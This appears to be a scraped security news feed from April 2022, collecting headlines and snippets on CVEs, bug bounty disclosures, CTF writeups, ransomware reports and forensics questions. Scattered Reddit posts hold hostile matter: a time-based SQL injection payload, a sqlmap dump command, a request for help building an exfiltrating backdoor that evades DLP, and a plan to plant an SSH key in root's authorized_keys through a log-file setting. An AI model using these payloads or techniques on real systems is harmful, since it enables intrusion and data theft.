    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on “Hackerone” , I had set target in my mind that I have to bypass 2fa, so I checked every method to bypass “Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    1-click RCE in Electron Applications
    How simple link opening leads to RCE Continue reading on Medium »
    Userland City — HackTheBox — Challenge — Web Exploitation — Writeup
    Hello guys I am back to posting another writeup. So let’s start talking instead of wasting our time lol. Continue reading on Medium »
    Neonify — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to another writeup. So today we are talking about Neonify Web challenge. So let’s start talking about it. Continue reading on Medium »
    Nginxatsu — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys we are back to posting another writeup about Web Exploitation challenge on HackTheBox. So let’s start talking about it. Continue reading on Medium »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    Aave V3’s Price Oracle Manipulation Vulnerability
    On April 7th, after Aave V3 had launched for 3 weeks, we discovered an issue on Aave V3’s price oracle. To be more specifically, the… Continue reading on Medium »
  • Open

    FBI:BlackCat 勒索软件至少入侵了全球 60 个实体
    2021年11月至2022年3月期间,BlackCat勒索软件团伙,至少入侵了全球 60 个组织的网络系统。
    五眼联盟发布咨询,警惕俄罗斯网络攻击
    五眼联盟的网络安全机构发布联合咨询,警惕具有俄罗斯背景的攻击者对关键基础设施发动网络攻击。
    FreeBuf甲方群话题讨论 | 聊聊企业HW行动
    随着今年HW行动将至,会有哪些新的攻防趋势?攻防前可以有哪些自查方案?攻防期间有碰到过哪些奇葩事件?
    ALAC音频格式存漏洞,全球超半数 Android 用户隐私受威胁
    研究人员在去年发现了 ALAC 格式的漏洞,这些漏洞可能导致攻击者远程访问目标设备中的媒体和音频对话。
    Android中的严重bug可导致用户媒体文件被访问
    安全分析师发现,由于Apple无损音频编解码器(ALAC)的实施存在缺陷。
    FreeBuf周报 | 官方曝光美国网络攻击武器“蜂巢”;联想三个漏洞影响数百万台电脑
    那个曾经看似风平浪静的互联网,底下正暗流涌动,当我们还在享受互联网带来的服务时,无数的后门和木马早已悄悄嵌入其中。
    讲师招募中 | FreeBuf精品公开课需要发光发热的你~
    你是否有“一身绝技”无处施展?又或是空有“有趣的灵魂”,却鲜为人知?别着急!FreeBuf精品公开课拍了拍“你”,并递上一份邀请函~一起来看看吧!
    小心,LinkedIn的求职简历被“坏蛋”盯上了
    名为“more_eggs”的恶意软件正潜藏在简历中,对目标公司相关账户进行窃取。
  • Open

    Aave V3's Price Oracle Manipulation Vulnerability
    Article URL: https://medium.com/@hacxyk/aave-v3s-price-oracle-manipulation-vulnerability-168e44e9e374 Comments URL: https://news.ycombinator.com/item?id=31117915 Points: 2 # Comments: 0
  • Open

    If you have a WordPress site and have clients that require service from your company. Please disable the admin login. This is just a lab machine but as a blueteamer I see to much of this in the wild. I'm not releasing a email if your secure message site is not secure.
    submitted by /u/newworldsamurai3030 [link] [comments]
  • Open

    Bypass of fix #1370749
    Shopify disclosed a bug submitted by encryptsaan123: https://hackerone.com/reports/1489077 - Bounty: $900

  • Open

    After changing the storefront password, the preview link is still valid
    Shopify disclosed a bug submitted by tomorrow_future: https://hackerone.com/reports/1370749 - Bounty: $900
    Open redirect by the parameter redirectUri in the URL
    BlackRock disclosed a bug submitted by mrccrqr: https://hackerone.com/reports/1250758
    [h1-2102] [Plus] User with Store Management Permission can Make changeDomainEnforcementState - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084892 - Bounty: $1900
    [h1-2102] [Plus] User with Store Management Permission can Make convertUsersFromSaml/convertUsersToSaml - that should be limited to User Management
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084904 - Bounty: $1900
    [h1-2102] [PLUS] User with Store Management Permission can Make enforceSamlOrganizationDomains call - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084939 - Bounty: $1900
    User with no Develop apps permission can Uninstall Custom App
    Shopify disclosed a bug submitted by ayyoub: https://hackerone.com/reports/1466855 - Bounty: $600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserRole
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1084638 - Bounty: $950
    Same the Url
    Shopify disclosed a bug submitted by 4bel: https://hackerone.com/reports/1459338 - Bounty: $500
    curl proceeds with unsafe connections when -K file can't be read
    curl disclosed a bug submitted by medianmedianstride: https://hackerone.com/reports/1542881
    Timing difference exposes existence of accounts
    Zivver disclosed a bug submitted by martinvw: https://hackerone.com/reports/1391636
  • Open

    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based…
    This is the first post in a series called ‘Smashing the Modern Web Tech Stack.’ Modern Web Applications today are more complex than ever… Continue reading on Medium »
    Testnet Bug Bounty Winners List & Swappi Early Adopters Raffle
    Dear Swappicados: the winner list has final come! Continue reading on Medium »
    Open Redirect: Just a redirection?
    Greetings, everyone! i’m back with a new article after a long absence. In this writeup, i will attempt to explain everything i know about… Continue reading on Pentester Nepal »
    Vulnerability Research List
    Vulnerability Research OA/Middleware/Framework (Index). Open source products, foreign application software Continue reading on Medium »
    Open Redirection into Bentley System
    Hello, Hackers Welcome to another write-up where I have shared a scenario of Open Redirection… Continue reading on Medium »
    Weather App — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. It’s about Web again and yeah let’s start talking ;) Continue reading on Medium »
    Under Construction — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. So let’s start talking. So we can login to the page. I tried admin:admin and it didn’t… Continue reading on Medium »
    Toxic — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back. You may know me. My name is rootjkqsta. So today I was on HackTheBox pwning machines and challenges. So I saw this… Continue reading on Medium »
    LoveTok — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello we are back to another writeup. Now we are talking about LoveTok It’s about Web Exploitation by the way! So let’s start talking. Continue reading on Medium »
    Breaking Grad — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello ladies and gentlemen. I am back to posting a new writeup. Now we are talking about Breaking Grad Web Exploitation challenge. So… Continue reading on Medium »
  • Open

    malware analysis project
    hello guys, I'm trying to build a Linux user space backdoor with data exfiltration capabilities but I'm thinking about the data loss prevention softwares ,dlp (endpoint protection). my question is ,how to overcome this protection? and if someone has resources about a topic similar to mine can you help? submitted by /u/Mind-Thief1122 [link] [comments]
    how to secure port 135
    I understand the importance of having RPC service enabled for windows to function properly, but it poses a lot of risk in the online world. what is the general best practice to keep this port secured? submitted by /u/Playful-Net9746 [link] [comments]
    How many IRemoteWinSpool RDP binds are "normal" when not printing?
    I've been noticing IRemotewinspool rdp binds from some of our PCs. It got my attention because of PrintNightmare and the fact that none of us have been printing anything. I'm trying to find more information about this online but I can't find anything about "normal" IRemoteWinsPool amongst all the PrintNightmare stuff. Should the service be used without anybody printing? Thank you submitted by /u/techsupportwantedpls [link] [comments]
    Any good tools for finding sequential keys in a batch of requests?
    Hello, I'm looking for a tool to search through the responses from a batch of http requests and find values that might be sequential keys, bonus points if it can replay the requests and verify the value is in fact a sequential key. thanks submitted by /u/quickmodel_ai [link] [comments]
    Linux question for an application 'bug' I'm trying to tease out
    I've been playing with a proprietary linux agent recently, it runs as root and it allows a non-root users to arbitrarily set the location of its log files. I can change the location of the log files to anywhere on the file system. I can also, mostly, change the file name. The key issues being that the software appends the date to any filename I choose though! For example, I discovered I can set the logfile name and location to here /root/.ssh/authorized_keys_20220202 I can 'log' my own SSH key into the file contents too. If I could get the file named correctly it would work (which I tested), but I can't. The authorized key is ignored in that name format, which is completely understandable. Do you think this limitation in my ability to control the full file name means I'm done? I've been thinking about other services I know of like .rhosts but I think the same issue would exist. Anyone got any good ideas? submitted by /u/shite_in_a_bucket [link] [comments]
    Advice on getting more interviews for threat intelligence jobs?
    If this is too broad or just generally not allowed here I can delete this. I'm trying to pivot to cyber security and I'm applying for threat intelligence jobs because I already have a strong background in intelligence already (DOD, IC, military). What can I do to increase my chances of getting interviews and offers? I have Network+, scheduled to take Security+ this summer, and after that I'm looking to get another cert (possibly CEH). Also have a TS/SCI and my intelligence background is technical analysis (signals intelligence, network analysis, etc.). Currently dual-hatting as a SME analyst and as a front end developer (HTML, CSS, JS, Angular). Also a advanced beginner / early intermediate Python coder and I've done personal projects to visualize IP connections and Wi-Fi survey type stuff. I've played around with Kali Linux before and DNS dumpster, Whois, Shodan, etc. so I'm comfortable learning technical tools and data. Also planning to deep dive into threat intel feeds and maybe set up my own dashboards for fun and for learning. Have already had 2 screening calls but I really want to break out of plain old DOD intel work and get into something technical and challenging. Any advice is greatly appreciated! P.S. Longer term I'd really like to get into threat hunting but I have 0 experience with any of that so I figured threat intel would be a good way to break into the industry for starters. submitted by /u/WLANtasticBeasts [link] [comments]
  • Open

    Encase Aquistion to forensics mode
    Yes, I'm bringing this post back to the spotlight i cannot get encase to go into forensics mode i have admin privilege over the system my keys are active and I've tried it on 3 different versions is there any tips on how to get this working? submitted by /u/Metriczcaptian88 [link] [comments]
    Forensic Certifications
    HI all , I want to get into digital forensics and was wondering what certifications i should get that will help me get a digital computer forensics job in the public / private sector (FBI , DHS , DOJ) etc.. ALso what would be the best way to prepare for them ? Currently i have the sec + and A+ cert and some programming expereince. submitted by /u/Fortune_Technical [link] [comments]
    Simple Question about Disk Imaging
    Yes, I am a newbie, yes I am just a clueless college student... I am not asking this question so you can tell me how stupid I am or for you to show how smart you are. Your boss is not going to see your response on a reddit post and give you a raise over it... So remember, please be nice. My question: How do forensic investigators create the disk image of a computer without having the password to the computer? I can use FTK imager, guymager, etc... But realistically, how will you use these programs when presented with a victim's computer to which you don't know the password of? Thank you lots! submitted by /u/uTeC3 [link] [comments]
    RAM/Memory Dump of iOS devices
    Hi community.. for my recent project I’m thinking if it is poss to take ram/memory dump of iOS device … I saw for android, it is possible to take systemdump using adb … Any tool to work same as in iOS Any suggestions would be great Thanks submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    Home-Grown Red Team: Testing Common AV Evasion With PE Packers On Windows 11
    Bypassing AV solutions is essential for initial access, lateral movement and full domain compromise. Over the last couple of years, we’ve… Continue reading on Medium »
    How To Get The Most Out Of Pen Tests
    I recently wrote an article for the CyCognito blog on getting the most out of pen tests. Pen tests are needed and, when properly done… Continue reading on Medium »
    RED TEAM | KLSFP Certification
    What is Red Teaming? Continue reading on Medium »
    How do I take over Cobalt Strike Team Servers
    Hi folks, today I would like to share how I take over some Cobalt Strike TeamServers with Quake and Password Spray Attack. From the… Continue reading on Medium »
  • Open

    Threat Assessment: BlackByte Ransomware
    BlackByte is ransomware as a service that emerged in July 2021. Read our overview and recommended courses of action for mitigation. The post Threat Assessment: BlackByte Ransomware appeared first on Unit42.
  • Open

    Maltego’s Attempts at Cryptocurrency Investigations
    Maltego is haunted by the laurels of grandiose cryptocurrency investigations… Continue reading on Medium »
    War in Ukraine / April 20
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Another cyberdetective trap
    I came across an interesting GPS tracker https://osmodroid.ru, https://osmo.mobi/app project that allows you to get a digital fingerprint… Continue reading on Medium »
    Recon tools for webapp penetration testing Part-1 (WebProxies & DNS Discovery) tools
    Here are some webapp penetration tools Continue reading on Medium »
    How do I take over Cobalt Strike Team Servers
    Hi folks, today I would like to share how I take over some Cobalt Strike TeamServers with Quake and Password Spray Attack. From the… Continue reading on Medium »
  • Open

    Keeping Up With PHP Updates
    Staying on top of critical security risks and vulnerabilities is imperative for the safety of your website. Some of the types of threats impacting our client sites include injections, broken authentication, cross site scripting, or even attackers targeting components with known vulnerabilities. In this post, we’ll be going over why outdated PHP versions can lead to an increase in vulnerabilities with your website and how you can minimize these risks to protect your site and your visitors. Continue reading Keeping Up With PHP Updates at Sucuri Blog.
  • Open

    SecWiki News 2022-04-21 Review
    利用神经网络挖掘共同特征发现未知的APT by ourren BinAbsInspector:二进制文件自动化静态漏洞检测工具 by ourren 一窥世界上延迟最低的网络 by Avenger WMI后门技术的攻击与检测 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-21 Review
    利用神经网络挖掘共同特征发现未知的APT by ourren BinAbsInspector:二进制文件自动化静态漏洞检测工具 by ourren 一窥世界上延迟最低的网络 by Avenger WMI后门技术的攻击与检测 by ourren 更多最新文章,请访问SecWiki
  • Open

    JBoss EAP/AS <= 6.* RCE - A little bit beyond \xAC\xED
    submitted by /u/j_jjjj [link] [comments]
    Hello all, I have release a new version of SCodeScanner v2.1.0 where it contains advance rules and some additonal features. Features includes removing false positives, send outputfile directly to jira and Slack, more info - https://github.com/agrawalsmart7/scodescanner & https://scodescanner.info.
    submitted by /u/agrawal7 [link] [comments]
    CVE-2022-21449 PoC demonstrating TLS MITM
    submitted by /u/kmhn [link] [comments]
  • Open

    官方发布重磅报告,全面曝光美国网络攻击武器“蜂巢”
    那个曾经看似风平浪静的互联网,底下正暗流涌动,当我们还在享受互联网带来的服务时,无数的后门和木马早已悄悄嵌入其中。
    知识大陆招募 | 这里有未来,而你刚好在
    本期将招募3位领主!一起参与知识大陆共建共享吧!
    FreeBuf早报 | 俄罗斯APT组织继续瞄准乌克兰;BlackCat勒索软件入侵全球60个实体
    Black Cat 勒索软件团伙,在 2021 年 11 月至 2022 年 3 月期间,至少入侵了全球 60 个组织的网络。
    REvil的TOR网站重新启动,一大波新型勒索软件或正在路上
    近日,有相关研究显示,REvil勒索软件在TOR网络上的服务器在经历数月的寂静后恢复了正常运行。
    FBI警告针对美国农业部门的勒索软件攻击
    美联邦调查局(FBI)警告食品和农业(FA)部门勒索软件团伙“更有可能”在收获和种植季节对其发动网络攻击。
    北约2022 “锁盾 ”网络演习在爱沙尼亚举行,2000名安全专家共同练兵
    北约合作网络防御卓越中心(CCDCOE)于4月19日至22日组织2022年度“锁盾”网络演习。
    《安恒网络安全3月月报》| 一份报告看全3月黑灰产、漏洞、APT、勒索、暗链等汇总信息
    一份报告看全3月黑灰产、漏洞、APT、勒索、暗链等汇总信息。
  • Open

    Exploiting Security Checks on Bind Mount
    submitted by /u/tbhaxor [link] [comments]
  • Open

    解决哥斯拉内存马 pagecontext 的问题
    作者:Y4er 原文链接:https://y4er.com/post/solve-the-problem-of-godzilla-memory-shell-pagecontext/ 前言 注入内存马借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决 HttpSession session = ...
  • Open

    解决哥斯拉内存马 pagecontext 的问题
    作者:Y4er 原文链接:https://y4er.com/post/solve-the-problem-of-godzilla-memory-shell-pagecontext/ 前言 注入内存马借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决 HttpSession session = ...
  • Open

    What do you need to know to develop expert-level exploits?
    Developing professional-level 0day and slient exploits, breaking them, example jpeg word macro etc etc. what needs to be learned to write advanced exploits. I'm learning c and c++, I work 8 hours a day, and the remaining 2 hours I work on python, what do you think I need to learn to write and understand exploits at a full professional level? submitted by /u/Sargatanas_ [link] [comments]
  • Open

    Know The Difference Between XSS vs CSRF
    Cross-site Scripting (XSS) and Cross-site request forgery (CSRF) are very common client-site attacks against web applications. While XSS… Continue reading on Medium »
  • Open

    【安全通报】Atlassian Bitbucket Data Center 远程代码执...
    近日,Atlassian发布安全公告,修复了一个存在于Atlassian Bitbucket Data Center中的代码执行漏洞,该漏洞...
  • Open

    【安全通报】Atlassian Bitbucket Data Center 远程代码执...
    近日,Atlassian发布安全公告,修复了一个存在于Atlassian Bitbucket Data Center中的代码执行漏洞,该漏洞...

  • Open

    Best Practice Regarding iMessage Sync In UFED iOS Extraction Scenarios
    What exactly happens to iMessage data (attachments and message content) when the Message Sync button found at Settings>name>iCloud>Messages is enabled? Does the data leave the device and join the cloud where it is then synced across other iOS devices that belong to the user or does this data remain locally with a copy of this data existing in the cloud? Perhaps a mixture of the two occurs? Within the context of a forensic iOS data extraction via UFED, I have some colleagues who believe it’s best practice to disable message sync prior to the extraction attempt so that the messages are downloaded back to the device and are included in the subsequent extraction dataset. In contrast, I have other colleagues who claim iMessage data never truly leaves the sms.db so even if message sync is enabled, extraction via UFED should result in all iMessage data being captured anyway. This article from Elcomsoft seems to somewhat support the latter theory, albeit vaguely. I haven’t been able to find any other research into this. What are your thoughts? What is best practice for forensic iOS data extraction when Message Sync is enabled? Do you disable Message Sync and wait for whatever is happening to finish or do you just perform the data extraction with no regard for the Message Sync setting? submitted by /u/ucfmsdf [link] [comments]
    FTK imager recover deleted files
    Hi guys im new to ftk imager i have created a seperate D drive on my windows machine and deleted some files from it. In ftk imager i created a new disck image logical drive raw format. I see the deleted files and click on export file. After opening the exported file i get an error saying "The file cant be opened That might be because the file type is unsupported, the file extension is incorrect, or the file is corrupt." .Any idea what im doing wrong? submitted by /u/Fortune_Technical [link] [comments]
    No boot after conversion of .E01
    Hello everyone!I'm trying to convert an .E01 to a vMware machine, but every time I try to start the virtual machine there is not bootable device. I tried to mount the forensics image with FTK Imager as a physical disk (writable, without logic unit), and open it with vMware.Also, i tried with Oracle VM VirtualBox and Mount Image Pro v7 without results.I also tried the conversion using vboxmanage.exe, using the result file with vMware Player ​ https://preview.redd.it/9a6ob5cmspu81.jpg?width=722&format=pjpg&auto=webp&s=3cac78e0145092fc785c3a00e4356c83418aaa06 Someone can help me, please?I need to run the OS inside my .E01 file to run a specific software submitted by /u/Zipper_Ita [link] [comments]
  • Open

    What VPS to choose?
    There are tons of cloud providers that offer different types of servers with a lot of different options. I will talk about the ones I… Continue reading on Medium »
    Exploiting a File Upload Vulnerability  — A Directory Traversal Attack
    Hello people, happy to have you here once again. I do hope you enjoy this write-up as much as I enjoyed ‘writing’ it. I would have to… Continue reading on Medium »
    Container Escape Vulnerability in AWS Hot Patch
    Update or mitigate now if you are affected (if you run containers, you probably are.) Continue reading on Cloud Security »
    Hacked REDBUS WordPress plugin and able to perform Cross-site Scripting Vulnerability….
    Hello, Hackers Welcome back to another writeup where I have shared a scenario of WP_plugin being vulnerable to Cross-site Scripting… Continue reading on Medium »
    youtube.com or уoutube.com??
    As you can see both of them looks identical but the thing is the second уoutube.com wont work.Your first reaction “How the hell its… Continue reading on Medium »
    CVE-2022–29072 Windows Privilege Escalation
    7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the… Continue reading on Medium »
  • Open

    Survey website that only allows one submission a month
    My company has a survey that only allows one submission a month. All other submissions are not counted or reviewed. I'm assuming that the website tracks IPs. I want to ensure that I cannot be traced back to my survey and I want to be able to submit multiple surveys a month. Would a VPN protect my identity. Is there another way that the company could be tracking me or submissions? submitted by /u/thukirby [link] [comments]
    Question about Blind SQL injection?
    Hi I was wondering if someone could shed some light, Currently was scanning my site testing out wapiti and i was shock to find 11 blind sql injection, which im thinking its a false alert whats odd is that in no part of the website i tried accessing shows any errors /_next/image?url=%2F_next%2Fstatic%2Fimage%2Fpublic%2Fimg%2Fbanners%2Fbanner-XXX-XXXX-XXX-XXX.2d09a971dce1f42dXXXXXXXXX.jpg%2Csleep%287%29%231&w=1200&q=75 HTTP/1.1 i tried on sqlmap but not sure if that was the correct mapping? ​ sqlmap -u "https://mydomain/_next/image?url=75*" --dbs --level=5 --risk=3 --dump --batch --tamper=space2comment --threads 10 ​ Thank you submitted by /u/killmasta93 [link] [comments]
  • Open

    $10k Host header vulnerability in Google App Engine
    Article URL: https://sites.google.com/site/testsitehacking/10k-host-header Comments URL: https://news.ycombinator.com/item?id=31102998 Points: 2 # Comments: 0
    Java 15 introduced a cryptographic vulnerability
    Article URL: https://www.itnews.com.au/news/java-15-introduced-a-cryptographic-vulnerability-578958 Comments URL: https://news.ycombinator.com/item?id=31096184 Points: 79 # Comments: 31
  • Open

    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317024
    Full account takeover in due lack of rate limiting in forgot password
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1059758
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537694
    CORS Misconfiguration
    U.S. Dept Of Defense disclosed a bug submitted by shirshak: https://hackerone.com/reports/1530581
    Reflected XSS in the shared note view on https://evernote.com
    Evernote disclosed a bug submitted by sarka: https://hackerone.com/reports/1518343 - Bounty: $500
  • Open

    looking for an exploiter who can create gametools for an online game
    submitted by /u/dr4iner [link] [comments]
    Career Change Options: Binary Exploitation or Pentesting/Red Teaming
    Hi All, I currently do Incident Response and Threat Hunting for an organization and lost the passion. A few months ago, I found binary exploitation and liked it. However, I'm stuck on a roadmap. I thought of moving laterally to the RED team side, thinking it would be a good foundation. However, with pentesting there would be a lot to learn since your skills need to be broad. I wouldnt have the chance also to create exploits. I want to develop exploits and find new vulnerabilities. I have been doing RE and Malware analysis for some time now as a side hobby and some Binary Exploitation courses. As a security professional my interests and goals right now are to break tech (new and old) and find unique and creative ways of entering. Wondering what a good path/road map to take to get into vulnerability research? The way I see it there's two options: Get into pentesting (AD and Web) to learn the building blocks and do VR on the side. Find the area you want to specialize in and focus on the vulns there. Gain experience and do red teaming. Find a codebase and platform within a Bug Bounty platform, research the hell out of it, and start poking around. Maybe move into AppSec. Very new to this side of the house, so please feel free to correct me or add your opinions thanks! submitted by /u/SushiSush1 [link] [comments]
  • Open

    Threat Hunting for Phishing Pages
    submitted by /u/mstfknn [link] [comments]
    CVE-2022-21449 detector - Finds possibly vulnerable JAR/WAR files
    submitted by /u/SRMish3 [link] [comments]
    A Detailed Analysis of The SunCrypt Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    SSRF Attack Examples and Mitigations
    submitted by /u/benarent [link] [comments]
    CVE-2022-21449: Psychic Signatures in Java
    submitted by /u/Gallus [link] [comments]
  • Open

    JDK CVE-2022-21449
    Article URL: https://access.redhat.com/security/cve/cve-2022-21449 Comments URL: https://news.ycombinator.com/item?id=31101123 Points: 2 # Comments: 0
    Jira Server and Jira Data Center CVE-2022-0540 – Authentication Bypass in Seraph
    Article URL: https://community.atlassian.com/t5/Jira-articles/Jira-Server-and-Jira-Data-Center-CVE-2022-0540-Authentication/ba-p/2006104 Comments URL: https://news.ycombinator.com/item?id=31100115 Points: 4 # Comments: 0
    CVE-2022-29153: To Consul or Not to Consul
    Article URL: https://ronin.ae/news/2022/04/15/CVE-2022-29153-to-consul-or-not-to-consul.html Comments URL: https://news.ycombinator.com/item?id=31093969 Points: 1 # Comments: 1
  • Open

    OSINT in VKontakte
    Today I will analyze the main sources of data that I use when conducting OSINT investigations on the Russian social network VKontakte. Continue reading on Medium »
    War in Ukraine / April 19
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    SecWiki News 2022-04-20 Review
    浅谈攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-20 Review
    浅谈攻防演练 by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 工信部通报37款侵害用户权益App;一种实时语音算法可阻止麦克风窃听
    哥伦比亚大学的研究人员介绍,该算法可以预测性地工作,会推断用户接下来会说什么,并实时生成阻塞背景噪音以覆盖声音。
    警惕!加泰罗尼亚政治家活动家受间谍软件攻击
    一个并不起眼的零点击(zero-click)漏洞可能很早就被利用以安装来自以色列网络公司NSO和Candiru的间谍软件。
    针对DVR设备的新BotenaGo恶意软件变种
    近期,威胁分析人员发现了BotenaGo僵尸网络恶意软件的一种新变种。
    CISA 发出警告,攻击者正在利用 Windows 漏洞
    CISA 积极利用漏洞列表新增了 Windows Print Spooler 中的本地权限提升漏洞。
    ESET发出警告,联想三个漏洞影响数百万台电脑
    ESET研究人员在2021年10月向联想报告了这三个严重的安全漏洞,目前这些漏洞已经全部修复完成。
    数量猛增,LinkedIn已成为网络钓鱼者的最爱
    LinkedIn在今年第一季度的网络钓鱼活动急剧升温,目前已占全球网络钓鱼数量的52%,位居排行榜首位。
    FreeBuf早报 | 美中情局主站网络武器“蜂巢”曝光;联想固件漏洞影响数百万电脑
    近日,国家计算机病毒应急处理中心发现,“蜂巢”(Hive)恶意代码攻击控制武器平台系美国中央情报局(CIA)专用的主站网络武器。
  • Open

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    No content preview
    Create Bind and Reverse Shells using Netcat
    No content preview
  • Open

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    No content preview
    Create Bind and Reverse Shells using Netcat
    No content preview
  • Open

    Burp Suite Extensions for Web Hunting
    Introduction Continue reading on InfoSec Write-ups »
    $1000: How I could have Hack any account and become a billionaire overnightTop Crypto-Trading….
    No content preview
    Create Bind and Reverse Shells using Netcat
    No content preview

  • Open

    Alright guys, can someone help me find this attack I'm doing??
    So I received the following from my ISP. I received 4 other ones last week, and I believe that I have identified the machine. It's a desktop PC running Linux Mint. I'm okay with Linux, I've run a couple of headless servers before, and used ubuntu as a daily driver for a couple years, but outside of tasks I needed to complete my knowledge is not high. I can't find anything in any logs that indicates this activity, but I'll be honest, I don't even know how deep I'm looking. I also have no idea where I could have picked up a script like this either. ​ I'm likely gonna just nuke the machine, and get a new IP address from my ISP, but I'd like to try and isolate this first. My IP has been redacted, but everything is there otherwise. The previous failed attacks were all trying to breach german IPs, I can post those too if they would help. ​ ​ ​ A device using your connection attempted to access another network without authorization. Apr 18 16:02:58 li352-240 sshd[2818468]: pam_unix(sshd:auth): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXXX user=root Apr 18 16:03:00 li352-240 sshd[2818468]: Failed password for root from XXXXX port 51808 ssh2 Apr 18 16:03:01 li352-240 sshd[2818468]: Received disconnect from XXXXX port 51808:11: Bye Bye [preauth] Apr 18 16:03:01 li352-240 sshd[2818468]: Disconnected from authenticating user root XXXXX port 51808 [preauth] Apr 18 16:03:02 li352-240 sshd[2818491]: pam_unix(sshd:auth): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=XXXXX user=root.......... submitted by /u/Beginning-Pace-1426 [link] [comments]
    CHFI EXAM
    I am taking my ec- council CHFI cert in a week. As i have seen people are not a fan of this cert or ec - council (it was free otherwise i would have chosen a different one). That all being said i am taking the version 9 exam and study material is outdated, along with the labs and book they provide. So people who have taken it, what is they best way to study? i have sound exam questions and a few people said most of those questions are on the exam. Thank you, just trying to be ready for it submitted by /u/Critical-Balance7980 [link] [comments]
    How to convert a pcap file to an image file?
    I want to convert my pcap file to a png format file. submitted by /u/One-Ad2289 [link] [comments]
    What should I study for this job application?
    Hi everyone, I'm applying for a digital forensics job in LE and the first stage is a test. I have read the FAQs in this subreddit but found nothing about what to expect in job application tests (not interviews). The application states that applicants should prepare for the test by studying the following (roughly translated to English): - Law measures for digital evidence collection and chain of custody - Digital forensics - Operating systems - File systems - Windows registry - OSINT (Open Source Intelligence) I have some knowledge of all these subjects but I'm by no means an expert. What should I focus on while studying so that I can cover most bases? submitted by /u/InfoSecSensei [link] [comments]
    It’s not always clear which US Gov jobs are digital Forensics, so I’ve created a scraper!
    submitted by /u/Strijdhagen [link] [comments]
    I’ve noticed something interesting about the UITextInputContextIdentifiers.plist file (pulled from an encrypted iOS backup) - in some cases, it identify’s a Signal contact by phone number, whereas others are only listed by a UID … anyone else aware of the following?
    Can someone please explain to me UITextInputContextIdentifiers.plist - It seems to identify some contacts by phone number but others by UID code? I'm trying to get my head around the UITextInputContextIdentifiers.plist file and the way in which it identifies the contacts. As you're probably all aware, its a common file (certainly on iOS) to Whatsapp, Signal, iMessenger etc etc, which lists the users that a communications app interacts with. I've noticed however that there is some differences between different apps and files and times and dates that I view these files on one of my "daily drivers" that gets regular use.. Some UID's are random like this: ID_CK_40a10d98edf9f302ad15daac98bf2da665ab8 Some UID's are directly identifiable by the contact phone number (obviously I'm just usin…
  • Open

    AWS's Log4Shell HotPatch Vulnerable to Container Escape and Privilige Escalation
    submitted by /u/YuvalAvra [link] [comments]
    US Govt Cloud Security Needs ("SCuBA"): including Technical Reference Architecture and Extensible Visibility Reference Framework (eVRF) Guidebook links
    submitted by /u/ScottContini [link] [comments]
    Shielder - Printing Fake Fiscal Receipts - An Italian Job p.1
    submitted by /u/smaury [link] [comments]
    Teaching Burp a new HTTP Transport Encoding
    submitted by /u/0xdea [link] [comments]
    Exploiting, detecting, and correcting IAM security misconfigurations
    submitted by /u/MiguelHzBz [link] [comments]
    CVE-2022-26809 : Remote Procedure Call Runtime Vulnerability
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    AWS Log4Shell HotPatch Introduced a Container Escape Vulnerability
    Article URL: https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=31090332 Points: 8 # Comments: 1
  • Open

    AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation
    We identified severe security issues within AWS Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. The post AWS's Log4Shell Hot Patch Vulnerable to Container Escape and Privilege Escalation appeared first on Unit42.
  • Open

